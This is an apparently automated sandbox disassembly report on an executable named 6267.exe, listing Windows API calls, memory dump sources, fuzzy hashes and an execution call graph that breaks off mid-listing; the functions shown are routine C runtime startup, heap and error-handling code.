                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 001DAABF: _free.LIBCMT ref: 001DAACD
                                                                                                                                                                                        • Part of subcall function 001E0623: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,001E47F0,?,00000000,00000000), ref: 001E06C5
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 001DF6B3
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001DF6BA
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 001DF6F9
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001DF700
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 167067550-0
                                                                                                                                                                                      • Opcode ID: be0d48729bd79da1d82969882afe973e1e02bbffdf5ed803d20138544af41c4f
                                                                                                                                                                                      • Instruction ID: 4d7f03ac7984ab18fd13c95380ac08c3ec104c8c274c10753d1c0505f5d8e55f
                                                                                                                                                                                      • Opcode Fuzzy Hash: be0d48729bd79da1d82969882afe973e1e02bbffdf5ed803d20138544af41c4f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4121D671604215BFDB10AF629C8086B77ADEF14368710862EF81B97761EB30ED518760
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,001DAA3D,00000000,?,?,?,001DABD6,?), ref: 001DDBF7
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDC54
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDC8A
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,001DABD6,?), ref: 001DDC95
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                                                                      • Opcode ID: 584a5f127cc7539c2902bd402a4ecae27cc9e5407db21b86ed14db40b3e7216a
                                                                                                                                                                                      • Instruction ID: f58be267dd537627e2d32bcf1bb361cf4f3cd2d1e9bbd8a44c8373ae1359139a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 584a5f127cc7539c2902bd402a4ecae27cc9e5407db21b86ed14db40b3e7216a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D11A9723581116EDA1177B57CC6E3B269A9BE1775F25032BF125863D2EFB19C43C110
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,001DB4A7,001DD82D,?,?,001D7F22,?,?,?,?,?,001C20C3,?,?), ref: 001DDD4E
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDDAB
                                                                                                                                                                                      • _free.LIBCMT ref: 001DDDE1
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,001D7F22,?,?,?,?,?,001C20C3,?,?), ref: 001DDDEC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                                                                      • Opcode ID: 608232484074b29500af51051cfe47da98ca7d4d5512af852a295c28d202855c
                                                                                                                                                                                      • Instruction ID: 1f693b947e9c2adb35a76209e63828c7ea3a69d032627dac89024085683b5108
                                                                                                                                                                                      • Opcode Fuzzy Hash: 608232484074b29500af51051cfe47da98ca7d4d5512af852a295c28d202855c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6311A5B23489007EDE117BF9BC81A3B259BDBE57757260226F125863D1DF718C438620
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,001DE693,00000000,?,001E33BC,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 001DE544
                                                                                                                                                                                      • GetLastError.KERNEL32(?,001E33BC,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,001DE693,00000000,00000104,?), ref: 001DE54E
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001DE555
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2398240785-0
                                                                                                                                                                                      • Opcode ID: a8528dc89198fd102e9dfd51b411e974fca442bddbf89b76e20eff9dbc87a18b
                                                                                                                                                                                      • Instruction ID: ca87ae899d04a9dfc2f6af5ede8ac51f799aad6f40f85de49058c6c3a8267888
                                                                                                                                                                                      • Opcode Fuzzy Hash: a8528dc89198fd102e9dfd51b411e974fca442bddbf89b76e20eff9dbc87a18b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F06D36600115BBCB207BA2EC4899AFFE9FF583A53018112F51ACA621DB31E860DB90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,001DE693,00000000,?,001E3347,00000000,00000000,001DE693,?,?,00000000,00000000,00000001), ref: 001DE5AD
                                                                                                                                                                                      • GetLastError.KERNEL32(?,001E3347,00000000,00000000,001DE693,?,?,00000000,00000000,00000001,00000000,00000000,?,001DE693,00000000,00000104), ref: 001DE5B7
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001DE5BE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2398240785-0
                                                                                                                                                                                      • Opcode ID: e0a98df995534913a8a7395630ed47440c8e76303bb6657211e23a1b60340133
                                                                                                                                                                                      • Instruction ID: b66bd8b4715ceca312e6118e315abce4d93751033cb99bd8612f6653d4f5763a
                                                                                                                                                                                      • Opcode Fuzzy Hash: e0a98df995534913a8a7395630ed47440c8e76303bb6657211e23a1b60340133
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11F08636600516FBCB207FA2DC4895ABFE9FF547A53018112F51ECA621D731E850D7D0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(001C5020,00000000,001F68E8,00000000,001C5020,?,001E5757,001C5020,00000001,001C5020,001C5020,?,001E2B7F,00000000,?,001C5020), ref: 001E6057
                                                                                                                                                                                      • GetLastError.KERNEL32(?,001E5757,001C5020,00000001,001C5020,001C5020,?,001E2B7F,00000000,?,001C5020,00000000,001C5020,?,001E30D3,001C5020), ref: 001E6063
                                                                                                                                                                                        • Part of subcall function 001E6029: CloseHandle.KERNEL32(FFFFFFFE,001E6073,?,001E5757,001C5020,00000001,001C5020,001C5020,?,001E2B7F,00000000,?,001C5020,00000000,001C5020), ref: 001E6039
                                                                                                                                                                                      • ___initconout.LIBCMT ref: 001E6073
                                                                                                                                                                                        • Part of subcall function 001E5FEB: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001E601A,001E5744,001C5020,?,001E2B7F,00000000,?,001C5020,00000000), ref: 001E5FFE
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(001C5020,00000000,001F68E8,00000000,?,001E5757,001C5020,00000001,001C5020,001C5020,?,001E2B7F,00000000,?,001C5020,00000000), ref: 001E6088
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                      • Opcode ID: 0aec7852a03e9b3d82420bf5fd4b3ccc4a53ec2a683b17be6b095d52d5942e3a
                                                                                                                                                                                      • Instruction ID: 4357cbe27431badd3c113cfa26083cd43f4e6f841fb3f6ee94f3470c375f6a7f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0aec7852a03e9b3d82420bf5fd4b3ccc4a53ec2a683b17be6b095d52d5942e3a
                                                                                                                                                                                      • Instruction Fuzzy Hash: E8F030365006A5BBCF221FD2DC04A9E3F66FF597B0B044414FA1985530CB7299A0DB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SleepConditionVariableCS.KERNELBASE(?,001D6E07,00000064), ref: 001D6E8D
                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(001F9708,000000FF,?,001D6E07,00000064,?,?,?,001C3CC0,001FC468,07E61CD7,?,00000000,001E84B8,000000FF), ref: 001D6E97
                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,001D6E07,00000064,?,?,?,001C3CC0,001FC468,07E61CD7,?,00000000,001E84B8,000000FF), ref: 001D6EA8
                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(001F9708,?,001D6E07,00000064,?,?,?,001C3CC0,001FC468,07E61CD7,?,00000000,001E84B8,000000FF), ref: 001D6EAF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3269011525-0
                                                                                                                                                                                      • Opcode ID: 25a4a5923befa5cdf6d026c5bd9572a479436b570a293d5033689f4d8d94edfd
                                                                                                                                                                                      • Instruction ID: bebccdd0e36e7fe6fbd14303d1ab57938e7827f715694726970fce41a10fc357
                                                                                                                                                                                      • Opcode Fuzzy Hash: 25a4a5923befa5cdf6d026c5bd9572a479436b570a293d5033689f4d8d94edfd
                                                                                                                                                                                      • Instruction Fuzzy Hash: FDE01239551328A7CB153F90EC49BED7F99EB08B61B000111F6096A670CB7168C0DFD1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 001DC574
                                                                                                                                                                                        • Part of subcall function 001DD301: HeapFree.KERNEL32(00000000,00000000,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?), ref: 001DD317
                                                                                                                                                                                        • Part of subcall function 001DD301: GetLastError.KERNEL32(?,?,001E10E1,?,00000000,?,?,?,001E1108,?,00000007,?,?,001E150A,?,?), ref: 001DD329
                                                                                                                                                                                      • _free.LIBCMT ref: 001DC587
                                                                                                                                                                                      • _free.LIBCMT ref: 001DC598
                                                                                                                                                                                      • _free.LIBCMT ref: 001DC5A9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 0dcd36eff64a3208fbb333d1d7ef627f123dc5e108e2474410c1b0223e3e79fe
                                                                                                                                                                                      • Instruction ID: 487993021354b9949adc9ebac55f774cabeddb611ed8f5a34c7d5ae2a0c3cce9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dcd36eff64a3208fbb333d1d7ef627f123dc5e108e2474410c1b0223e3e79fe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 30E0BFF1410531AA8B06BF15BD419B93A66FB947203410007F52866B35EF3B15D6EB83
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\6267.exe
                                                                                                                                                                                      • API String ID: 0-3599334778
                                                                                                                                                                                      • Opcode ID: 9ce24c3b7083ef8aa26d088bfed8e441825de08e75a2add9d19fdc853f460ea5
                                                                                                                                                                                      • Instruction ID: 7727d402f92b497a9bd9f4a5e7daaf19a3353bca626f9ed50ea7073c14a545dd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ce24c3b7083ef8aa26d088bfed8e441825de08e75a2add9d19fdc853f460ea5
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF418071A18618EBCB25EB999CC1AAEBBF8FB95310F12006BF402A7351DB719A40D750
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001D8C52
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                      • Opcode ID: 371ab01668bde4eb2e02e814c7591dc9890aa35f7d80a21cc324bdffc80900b9
                                                                                                                                                                                      • Instruction ID: 985c89ed828c3e5da1d02d44d76075fdc72a8c4317612e9b107f44d296abb1a6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 371ab01668bde4eb2e02e814c7591dc9890aa35f7d80a21cc324bdffc80900b9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C414A71900209EFCF15DF98CD81AEEBBB6FF58300F14419AFA146B2A1D735A950DB60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 001D1DB0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000D.00000002.484764731.00000000001C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484818816.00000000001EE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484830152.00000000001F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000D.00000002.484838400.00000000001FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_1c0000_6267.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                      • String ID: 5120$H
                                                                                                                                                                                      • API String ID: 514040917-2391956277
                                                                                                                                                                                      • Opcode ID: 495dabda16191f4cb035c9f0cc6b6d52766f2153570812130a54d2dac55e0fe7
                                                                                                                                                                                      • Instruction ID: 6100c64f412c221b279a902a644f9616a98f8b2c5f2ad235e0eef5d7295d6b1c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 495dabda16191f4cb035c9f0cc6b6d52766f2153570812130a54d2dac55e0fe7
                                                                                                                                                                                      • Instruction Fuzzy Hash: DB21CFB4900358ABDB14EF28CA067DD7FB9AB16704F9401CDE54917382D7758B488BE3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:3.6%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:1700
                                                                                                                                                                                      Total number of Limit Nodes:23
                                                                                                                                                                                      execution_graph 18019 1057434 18020 1057440 CallCatchBlock 18019->18020 18045 105715a 18020->18045 18022 1057447 18023 10575a0 18022->18023 18033 1057471 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 18022->18033 18098 10575c0 IsProcessorFeaturePresent 18023->18098 18025 10575a7 18026 10575ad 18025->18026 18102 105a74f 18025->18102 18105 105a713 18026->18105 18030 1057490 18031 1057511 18056 105c17d 18031->18056 18033->18030 18033->18031 18081 105a729 18033->18081 18035 1057517 18060 1055530 18035->18060 18046 1057163 18045->18046 18108 10577ad IsProcessorFeaturePresent 18046->18108 18050 1057174 18051 1057178 18050->18051 18118 105c5e9 18050->18118 18051->18022 18054 105718f 18054->18022 18057 105c186 18056->18057 18059 105c18b 18056->18059 18378 105bee1 18057->18378 18059->18035 18782 1049c70 18060->18782 18062 105553e 18843 1049790 18062->18843 18064 105554d 18914 1049140 GetModuleFileNameA 18064->18914 18082 105a73f _unexpected CallCatchBlock 18081->18082 18082->18031 18083 105dbf2 _unexpected 37 API calls 18082->18083 18084 105c9ce 18083->18084 18085 105ca58 __FrameHandler3::FrameUnwindToState 37 API calls 18084->18085 18086 105c9f8 18085->18086 18099 10575d5 ___scrt_fastfail 18098->18099 18100 1057680 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18099->18100 18101 10576cb ___scrt_fastfail 18100->18101 18101->18025 18103 105a5ed __FrameHandler3::FrameUnwindToState 23 API calls 18102->18103 18104 105a760 18103->18104 18104->18026 18106 105a5ed __FrameHandler3::FrameUnwindToState 23 API calls 18105->18106 18107 10575b5 18106->18107 18109 105716f 18108->18109 18110 105819f 18109->18110 18127 1059409 18110->18127 18114 10581b0 18115 10581bb 18114->18115 18141 1059445 18114->18141 18115->18050 18117 10581a8 18117->18050 18182 1060b7b 18118->18182 18121 10581be 18122 10581c7 18121->18122 18123 10581d1 18121->18123 18124 1058605 ___vcrt_uninitialize_ptd 6 API calls 18122->18124 18123->18051 18125 10581cc 18124->18125 18126 1059445 ___vcrt_uninitialize_locks DeleteCriticalSection 18125->18126 18126->18123 18128 1059412 18127->18128 18130 105943b 18128->18130 18132 10581a4 18128->18132 18145 10597cb 18128->18145 18131 1059445 ___vcrt_uninitialize_locks DeleteCriticalSection 18130->18131 18131->18132 18132->18117 18133 10585d2 18132->18133 18163 10596dc 18133->18163 18136 10585e7 18136->18114 18139 1058602 18139->18114 18142 105946f 18141->18142 18143 1059450 18141->18143 18142->18117 18144 105945a DeleteCriticalSection 18143->18144 18144->18142 18144->18144 18150 1059693 18145->18150 18148 1059803 InitializeCriticalSectionAndSpinCount 18149 10597ee 18148->18149 18149->18128 18151 10596ab 18150->18151 18154 10596ce 18150->18154 18151->18154 18156 10595e7 18151->18156 18154->18148 18154->18149 18155 10596c0 GetProcAddress 18155->18154 18160 10595f6 ___vcrt_FlsFree 18156->18160 18157 1059688 18157->18154 18157->18155 18158 105960f LoadLibraryExW 18159 105962a GetLastError 18158->18159 18158->18160 18159->18160 18160->18157 18160->18158 18161 1059671 FreeLibrary 18160->18161 18162 1059649 LoadLibraryExW 18160->18162 18161->18160 18162->18160 18164 1059693 ___vcrt_FlsFree 5 API calls 18163->18164 18165 10596f6 18164->18165 18166 105970f TlsAlloc 18165->18166 18167 10585dc 18165->18167 18167->18136 18168 105978d 18167->18168 18169 1059693 ___vcrt_FlsFree 5 API calls 18168->18169 18170 10597a7 18169->18170 18171 10597c2 TlsSetValue 18170->18171 18172 10585f5 18170->18172 18171->18172 18172->18139 18173 1058605 18172->18173 18174 1058615 18173->18174 18175 105860f 18173->18175 18174->18136 18177 1059717 18175->18177 18178 1059693 ___vcrt_FlsFree 5 API calls 18177->18178 18179 1059731 18178->18179 18180 1059749 TlsFree 18179->18180 18181 105973d 18179->18181 18180->18181 18181->18174 18183 1060b8b 18182->18183 18184 1057181 18182->18184 18183->18184 18186 105f23e 18183->18186 18184->18054 18184->18121 18187 105f24a CallCatchBlock 18186->18187 18198 105cc03 EnterCriticalSection 18187->18198 18189 105f251 18199 105eab7 18189->18199 18192 105f26f 18223 105f295 18192->18223 18198->18189 18200 105eac3 CallCatchBlock 18199->18200 18201 105eaed 18200->18201 18202 105eacc 18200->18202 18226 105cc03 EnterCriticalSection 18201->18226 18234 105b4a2 18202->18234 18207 105eadb 18207->18192 18212 105f0d4 GetStartupInfoW 18207->18212 18208 105eb25 18240 105eb4c 18208->18240 18210 105eaf9 18210->18208 18227 105ea07 18210->18227 18213 105f0f1 18212->18213 18214 105f185 18212->18214 18213->18214 18215 105eab7 26 API calls 18213->18215 18218 105f18a 18214->18218 18217 105f119 18215->18217 18216 105f149 GetFileType 18216->18217 18217->18214 18217->18216 18220 105f191 18218->18220 18219 105f1d4 GetStdHandle 18219->18220 18220->18219 18221 105f23a 18220->18221 18222 105f1e7 GetFileType 18220->18222 18221->18192 18222->18220 18377 105cc4b LeaveCriticalSection 18223->18377 18225 105f280 18225->18183 18226->18210 18243 105f5d6 18227->18243 18229 105ea19 18233 105ea26 18229->18233 18250 